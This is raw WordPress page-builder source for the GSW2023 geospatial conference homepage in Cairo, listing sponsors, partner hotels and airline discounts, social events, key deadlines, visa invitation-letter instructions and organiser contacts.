src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" 